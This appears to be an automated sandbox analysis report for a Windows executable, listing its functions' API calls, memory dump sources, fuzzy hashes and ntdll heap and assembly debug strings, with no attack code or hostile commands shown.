Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: AllocateDecodeHeapPointer__getptd_noexit
String ID: v.dw
API String ID: 2551771081-2452816266
Opcode ID: 2f056e0d01d476006496dd6f95556be0756946006c78d825dcb5d6f3cd150874
Instruction ID: 8b5c20343d6e0a2d437d296c2684ec949ef6feb384657de8e344704bfb0979fb
Opcode Fuzzy Hash: 2f056e0d01d476006496dd6f95556be0756946006c78d825dcb5d6f3cd150874
Instruction Fuzzy Hash: EE01B131609B159BEB659F37DC58BEA3795AF89B70F044629EC19CB1A0DB38C804EF50

Uniqueness

Uniqueness Score: 100.00%

Function 00FD19CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00FBC000), ref: 00FD1A05

Strings

.z`, xrefs: 00FD19F4, 00FD1A00

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: e47d6870e786c2f6be0366308e01b69a003a1326c91bd46ef00e7d720d15f1d6
Instruction ID: 5e02448b5a06cfb65079f8167306a6d3cd3e1eb941f1434d819f35da18748f9c
Opcode Fuzzy Hash: e47d6870e786c2f6be0366308e01b69a003a1326c91bd46ef00e7d720d15f1d6
Instruction Fuzzy Hash: 6FF03075600204AFD724EF94CC45EA7B778EF48320F158159FD5857342CA30E910CBA0

Uniqueness

Uniqueness Score: 1.34%

Function 00FD19D8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00FBC000), ref: 00FD1A05

Strings

.z`, xrefs: 00FD19F4, 00FD1A00

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 0f0f35eb780682e3b8b425648fbf178f7b3d417441be3e151792174d0ff02a23
Instruction ID: 5d86faa251e7df3a6512ddd0889a5149ca42127cbf2bfd635f08f74d1a748468
Opcode Fuzzy Hash: 0f0f35eb780682e3b8b425648fbf178f7b3d417441be3e151792174d0ff02a23
Instruction Fuzzy Hash: 54E01AB12002046BD714DF49CC85EA777ADAF88750F018559B90857241C531E914CAF0

Uniqueness

Uniqueness Score: 1.34%

Function 00FB1000, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FB16AB: _malloc.LIBCMT ref: 00FB1BA6
Part of subcall function 00FB16AB: std::exception::exception.LIBCMT ref: 00FB1BDB
Part of subcall function 00FB16AB: std::exception::exception.LIBCMT ref: 00FB1BF5
Part of subcall function 00FB16AB: __CxxThrowException@8.LIBCMT ref: 00FB1C06
Part of subcall function 00FB16AB: IsDebuggerPresent.KERNEL32 ref: 00FB1CC7
Part of subcall function 00FB16AB: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB1CDC
Part of subcall function 00FB16AB: UnhandledExceptionFilter.KERNEL32(00FB71B8), ref: 00FB1CE7
Part of subcall function 00FB16AB: GetCurrentProcess.KERNEL32(C0000409), ref: 00FB1D03
Part of subcall function 00FB16AB: TerminateProcess.KERNEL32(00000000), ref: 00FB1D0A

_memset.LIBCMT ref: 00FB101F
_memset.LIBCMT ref: 00FB1038

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled_memsetstd::exception::exception$CurrentDebuggerException@8PresentTerminateThrow_malloc
String ID:
API String ID: 671016078-0
Opcode ID: eed72977febd29057b24054a039ddfd1dfc0b1e08284e8dafdc78a8b6bcab041
Instruction ID: 2707b9d15fd383e6c9981c13a7b69e12549b0307ce6f891a9696b6448b143633
Opcode Fuzzy Hash: eed72977febd29057b24054a039ddfd1dfc0b1e08284e8dafdc78a8b6bcab041
Instruction Fuzzy Hash: 4DE0DFB2E5355022E222B1823D03FCA3209AB957E8F5C0230FB499A183F1482A2565AB

Uniqueness

Uniqueness Score: 0.65%

Function 00FB3F90, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00FB3F97

Part of subcall function 00FB4BC5: Sleep.KERNEL32(00000000,00000008,00FB10B4), ref: 00FB4BED

RtlEncodePointer.NTDLL(00000000), ref: 00FB3FA1

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: EncodePointerSleep__calloc_crt
String ID:
API String ID: 2859887112-0
Opcode ID: b0fdcb4eebde5e9a16a667ce522b9b7805d42d5dd55f2fd6a446de3e662fe544
Instruction ID: 8ad9273971054638bfca057192a6ca3e5b82ee41390d6a4d210e79ae2a595e2d
Opcode Fuzzy Hash: b0fdcb4eebde5e9a16a667ce522b9b7805d42d5dd55f2fd6a446de3e662fe544
Instruction Fuzzy Hash: 59E0C23294D3211AF3B16A257805BA63B90EB80730F114006F984D61C5EA2448854FA0

Uniqueness

Uniqueness Score: 0.51%

Function 00FB12FE, Relevance: 1.6, APIs: 1, Instructions: 99windowsleepUNIQUE

Download Yara Rule

APIs

Part of subcall function 00FB191C: __isxdigit_l.LIBCMT ref: 00FB1943

Part of subcall function 00FB1898: __isdigit_l.LIBCMT ref: 00FB18BD

Part of subcall function 00FB11C0: wsprintfW.USER32 ref: 00FB11DF
Part of subcall function 00FB11C0: SetDlgItemTextW.USER32(?,0000001B,?), ref: 00FB11EF

PostQuitMessage.USER32(00000000), ref: 00FB13AC
LoadIconW.USER32(?,0000006B), ref: 00FB13BD
GetSystemMetrics.USER32(0000000B), ref: 00FB13D0
GetSystemMetrics.USER32(0000000C), ref: 00FB13D9
CharUpperW.USER32(?), ref: 00FB13F4
GetDlgItem.USER32(?,00000000), ref: 00FB1406
SendMessageW.USER32(00000000,000000F3,00000001,00000000), ref: 00FB1426
Sleep.KERNEL32(00000064), ref: 00FB142A
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00FB143A
BeginPaint.USER32(?,?), ref: 00FB1442
CreateSolidBrush.GDI32(?), ref: 00FB14D9
FillRect.USER32(?,00000000,00000000), ref: 00FB14EC
DeleteObject.GDI32(00000000), ref: 00FB14F3
EndPaint.USER32(?,?), ref: 00FB1514
DefWindowProcW.USER32(?,?,?,?), ref: 00FB1555
MessageBeep.USER32(00000000), ref: 00FB168F

Part of subcall function 00FB16B6: IsDebuggerPresent.KERNEL32 ref: 00FB1CC7
Part of subcall function 00FB16B6: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FB1CDC
Part of subcall function 00FB16B6: UnhandledExceptionFilter.KERNEL32(00FB71B8), ref: 00FB1CE7
Part of subcall function 00FB16B6: GetCurrentProcess.KERNEL32(C0000409), ref: 00FB1D03
Part of subcall function 00FB16B6: TerminateProcess.KERNEL32(00000000), ref: 00FB1D0A

DestroyWindow.USER32(000A0106), ref: 00FB1575

Part of subcall function 00FB1000: _memset.LIBCMT ref: 00FB101F
Part of subcall function 00FB1000: _memset.LIBCMT ref: 00FB1038

SetFocus.USER32(?), ref: 00FB15D0

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Message$ExceptionFilterItemMetricsPaintProcessSendSystemUnhandledWindow_memset$BeepBeginBrushCharCreateCurrentDebuggerDeleteDestroyFillFocusIconLoadObjectPostPresentProcQuitRectSleepSolidTerminateTextUpper__isdigit_l__isxdigit_lwsprintf
String ID:
API String ID: 3436449669-0
Opcode ID: f49bdedcd685f8c72897000cf6684ef9818b3df5e82b92d455e8add1b29440f0
Instruction ID: 423411b1de2345da53782afc203e140029adbaf63fbf436edb5a8b7fa9cb201b
Opcode Fuzzy Hash: f49bdedcd685f8c72897000cf6684ef9818b3df5e82b92d455e8add1b29440f0
Instruction Fuzzy Hash: C211C6765041148BDB18DF19D8E5DFBB7E5FF8A310B48455EE4838BA88DB30A800DF92

Uniqueness

Uniqueness Score: 100.00%

Function 00FC07B8, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00FC0812

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2d35d87362c3cd8f54b3ca69e37a62feacdd971a358d765053d59b1f8367e342
Instruction ID: 0fec4f240f12a11f5994e20a27d7550815fbe9dd722a1fcebd47d0bdbf69d80c
Opcode Fuzzy Hash: 2d35d87362c3cd8f54b3ca69e37a62feacdd971a358d765053d59b1f8367e342
Instruction Fuzzy Hash: B101A731A802297BE720A6948D03FBE776C9B51B51F04411DFF04BA1C1EA98690697E6

Uniqueness

Uniqueness Score: 0.03%

Function 00FD1B29, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00FC741A,00FC741A,?,00000000,?,?), ref: 00FD1B68

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: dba871f2e09093dade1bb4689ca660361eb78d6d0016f8b4dada1cacbc10928c
Instruction ID: c2bfb9c5920824ee50d84aaf939a627b750d0ef0ced5961042272fba80dfcb9e
Opcode Fuzzy Hash: dba871f2e09093dade1bb4689ca660361eb78d6d0016f8b4dada1cacbc10928c
Instruction Fuzzy Hash: 89F08CB6200205BBDB11EF98DD84E9777AAAF89610F008855FA0867705C636E945CBB6

Uniqueness

Uniqueness Score: 0.02%

Function 00FD1998, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00FCC4DE,?,00FCCC57,00FCCC57,?,00FCC4DE,?,?,?,?,?,00000000,00000000,?), ref: 00FD19C5

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0d753897a72911c39c1a217d21141d5419ea8a5e7204a27a759ee0d711259b0d
Instruction ID: ec633eab8031a62eea2ad1ad25d793721087494427258ef56e78f694b939314f
Opcode Fuzzy Hash: 0d753897a72911c39c1a217d21141d5419ea8a5e7204a27a759ee0d711259b0d
Instruction Fuzzy Hash: ECE01AB12002046BD714DF49CC45EA777ADAF88650F014559BA085B241C531F914CAF0

Uniqueness

Uniqueness Score: 0.01%

Function 00FD1B38, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00FC741A,00FC741A,?,00000000,?,?), ref: 00FD1B68

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0c21a7870cb88adcfa1ccb6676d670d11624b1b2053deb4fb7a201a1a129462c
Instruction ID: 7c56cc0499fff1f0399a901acece1e503ed1107886b52ec7a3664263362c1230
Opcode Fuzzy Hash: 0c21a7870cb88adcfa1ccb6676d670d11624b1b2053deb4fb7a201a1a129462c
Instruction Fuzzy Hash: 8FE01AB12002086BDB14DF59CC45EEB37ADAF89650F018155BA0867242C935E9148BF5

Uniqueness

Uniqueness Score: 0.02%

Function 00FD1A18, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,00000000,?,?,?,00000001), ref: 00FD1A40

Memory Dump Source

Source File: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518765881.00FB1000.00000020.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e11f4fe61b7f98a912110c0dc9dc1357636697359e1afb8b24366ebfedbb3e50
Instruction ID: 8ec4d9f0b07b4145d0c967de5c21973e2ed548df2cabbd6666e568b59fb9ec72
Opcode Fuzzy Hash: e11f4fe61b7f98a912110c0dc9dc1357636697359e1afb8b24366ebfedbb3e50
Instruction Fuzzy Hash: DAD012726002147BD624DB98CC49FD7779CDF45750F054165BA0C6B241C531BA00C7E1

Uniqueness

Uniqueness Score: 0.01%

Function 00FB3FC1, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00FB1D55: __lock.LIBCMT ref: 00FB1D57

__onexit_nolock.LIBCMT ref: 00FB3FD9

Part of subcall function 00FB3EDA: RtlDecodePointer.NTDLL(0107F7B0,00FB71A0,?,?,?,00FB3FDE,?,00FB93D0,0000000C,00FB400A,?,?,00FB1BF0,00FB62CA,?), ref: 00FB3EEF
Part of subcall function 00FB3EDA: RtlDecodePointer.NTDLL(?,?,?,00FB3FDE,?,00FB93D0,0000000C,00FB400A,?,?,00FB1BF0,00FB62CA,?), ref: 00FB3EFC
Part of subcall function 00FB3EDA: __realloc_crt.LIBCMT ref: 00FB3F39
Part of subcall function 00FB3EDA: __realloc_crt.LIBCMT ref: 00FB3F4F
Part of subcall function 00FB3EDA: EncodePointer.KERNEL32(00000000,?,?,?,00FB3FDE,?,00FB93D0,0000000C,00FB400A,?,?,00FB1BF0,00FB62CA,?), ref: 00FB3F61
Part of subcall function 00FB3EDA: RtlEncodePointer.NTDLL(?,?,?,?,00FB3FDE,?,00FB93D0,0000000C,00FB400A,?,?,00FB1BF0,00FB62CA,?), ref: 00FB3F75
Part of subcall function 00FB3EDA: RtlEncodePointer.NTDLL(-00000004,?,?,?,00FB3FDE,?,00FB93D0,0000000C,00FB400A,?,?,00FB1BF0,00FB62CA,?), ref: 00FB3F7D

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 88e48fea322fe35049fa520fabe527ca79c59b7b2338e3bd17222e70df23bb25
Instruction ID: aeb2b259487a9f8f9801de1ea5656bd3d3e0af6d2a2096ac44d71fa5dd4b6b9f
Opcode Fuzzy Hash: 88e48fea322fe35049fa520fabe527ca79c59b7b2338e3bd17222e70df23bb25
Instruction Fuzzy Hash: F1D05E30E41209EADB10FBA6CC16BDDB6B06F04310F604104F424A60E2CABC4701BE05

Uniqueness

Uniqueness Score: 0.24%

Function 00FB17AF, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(Function_00001776,00FB1D95,00000000,00000000,00000000,00000000,00000000,00000000,773DF883,00FB2684,?,00FB1A50), ref: 00FB17B4

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: da46a8f980cb5e32d17cd6a58a32bbf95f5a63c717b762f0d06e8cf4c87f4762
Instruction ID: bc7bf56c89932390ac7db57b33e16a52bb261a582937d7a659d0edc6b2304af8
Opcode Fuzzy Hash: da46a8f980cb5e32d17cd6a58a32bbf95f5a63c717b762f0d06e8cf4c87f4762
Instruction Fuzzy Hash: 4CA022B08883008F8300BF30A8880083B20F380323B808202BC80E228CCF30000CFF02

Uniqueness

Uniqueness Score: 0.04%

Function 00FB22C0, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,00FB4801,0107FB18,00000314,00000000,?,?,?,?,?,00FB2160,0107FB18,Microsoft Visual C++ Runtime Library,00012010), ref: 00FB22C2

Memory Dump Source

Source File: 00000000.00000002.4518765881.00FB1000.00000020.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4518759786.00FB0000.00000002.sdmp Download File
Associated: 00000000.00000002.4518774745.00FB7000.00000002.sdmp Download File
Associated: 00000000.00000002.4518783364.00FBA000.00000040.sdmp Download File
Associated: 00000000.00000002.4518805542.00FE5000.00000080.sdmp Download File
Associated: 00000000.00000002.4518867202.0107F000.00000040.sdmp Download File
Associated: 00000000.00000002.4518875989.01081000.00000002.sdmp Download File

Yara matches

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: b0a848d52a83d19bb003c1ada1492ae4cc4750c6ed61d7589d68978ef79462ed
Instruction ID: 9ec8a1c7e3a8c619d1db693643e3bad8d330a3d85484c4b4682d074196daf6ee
Opcode Fuzzy Hash: b0a848d52a83d19bb003c1ada1492ae4cc4750c6ed61d7589d68978ef79462ed
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.04%

Non-executed Functions

Function 02634221, Relevance: 14.2, Strings: 11, Instructions: 424UNIQUE

Download Yara Rule

Strings

SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 026452B0
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 0264529A
@, xrefs: 025C5FA0
RtlpResolveAssemblyStorageMapEntry, xrefs: 026452CB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 02645231
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 026450D0
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 026452D0
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 02645264
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 026451A9
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 026451E0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 02645147

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 3535843008-4009184096
Opcode ID: 631a1fc381046bd76516a8f32291ff775f134884a8e1540327798568cf6b6b09
Instruction ID: 0bb1bcf0a096a7ff9cf212731b407602d5ada17a225e734d8b3eedf5d4d10ee8
Opcode Fuzzy Hash: 631a1fc381046bd76516a8f32291ff775f134884a8e1540327798568cf6b6b09
Instruction Fuzzy Hash: 08025DF19012289FDB25DF54CC80BEAB7B9BF54304F4441EAA649A7241EB309E84CF59

Uniqueness

Uniqueness Score: 100.00%

Function 0268548D, Relevance: 12.0, Strings: 9, Instructions: 799UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 02685B47, 02685B78, 02685BEC, 02685C41, 02685C9D, 02685D02, 02685D80
Free Heap block %p modified at %p after it was freed, xrefs: 02685C0D
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 02685D40
HEAP: , xrefs: 02685B85, 02685BF9, 02685C4E, 02685CAA, 02685D0F, 02685D30, 02685D8D
Heap block at %p is not last block in segment (%p), xrefs: 02685CBC
Heap block at %p has incorrect segment offset (%x), xrefs: 02685C5F
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 02685D26
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 02685BA1
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 02685D9D

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 01db1363616259929b47871125b9dde3e085dd3b47066672bce007a47426d3b8
Instruction ID: 3f206024f0d2e9c573b896e9efcaef0d2b79d26f4ef5681de6cec15cd0f69a44
Opcode Fuzzy Hash: 01db1363616259929b47871125b9dde3e085dd3b47066672bce007a47426d3b8
Instruction Fuzzy Hash: E162AD70600656DFDB28EF69C480A76B7F1FF48314B96829DE98B8B751D734E881CB50

Uniqueness

Uniqueness Score: 100.00%

Function 0268603E, Relevance: 11.7, Strings: 9, Instructions: 401UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 02686173, 026861DD, 02686332, 0268638A, 02686451, 026864A6
RtlFreeHeap, xrefs: 02686046
Total size of free blocks in arena (%ld) does not match number total in heap header (%ld), xrefs: 026863A8
Pseudo Tag %04x size incorrect (%x != %x) %p, xrefs: 02686476
Tag %04x (%ws) size incorrect (%x != %x) %p, xrefs: 026864CF
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 0268634E
HEAP: , xrefs: 02686180, 026861EA, 0268633F, 02686397, 0268645E, 026864B3, 026864C4, 026864C5
dedicated (%04x) free list element %p is marked busy, xrefs: 0268618F
Non-Dedicated free list element %p is out of order, xrefs: 026861F6

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
API String ID: 2167126740-3316276410
Opcode ID: 1c8b3c2474beaa1152e2d30bce94487041cb8ca7f3fa1fce482d143f1aee795f
Instruction ID: 7aabd1ecbeff6aa0562a96510840bf357561f7fbb22aa0519950504b1650eafd
Opcode Fuzzy Hash: 1c8b3c2474beaa1152e2d30bce94487041cb8ca7f3fa1fce482d143f1aee795f
Instruction Fuzzy Hash: B9F10330900246EFDB25EF68C480BBAB7F9FF08714F548299E9869B681C730E945DF61

Uniqueness

Uniqueness Score: 100.00%

Function 026868E8, Relevance: 10.3, Strings: 8, Instructions: 324UNIQUE

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 026869F0, 02686ADD, 02686BFB, 02686C8C, 02686CE8
About to rellocate block at %p to 0x%x bytes with tag %ws, xrefs: 02686B05
Just reallocated block at %p to 0x%x bytes with tag %ws, xrefs: 02686CB4
HEAP: , xrefs: 026869FD, 02686AEA, 02686C08, 02686C99, 02686CF5
RtlReAllocateHeap, xrefs: 0268692A, 0268692F, 026869B3
About to reallocate block at %p to %x bytes, xrefs: 02686A11
Invalid allocation size - %x (exceeded %x), xrefs: 02686D04
Just reallocated block at %p to %x bytes, xrefs: 02686C1C

Memory Dump Source

Source File: 00000000.00000002.4520123297.025C0000.00000040.sdmp, Offset: 025C0000, based on PE: true

Yara matches

Similarity
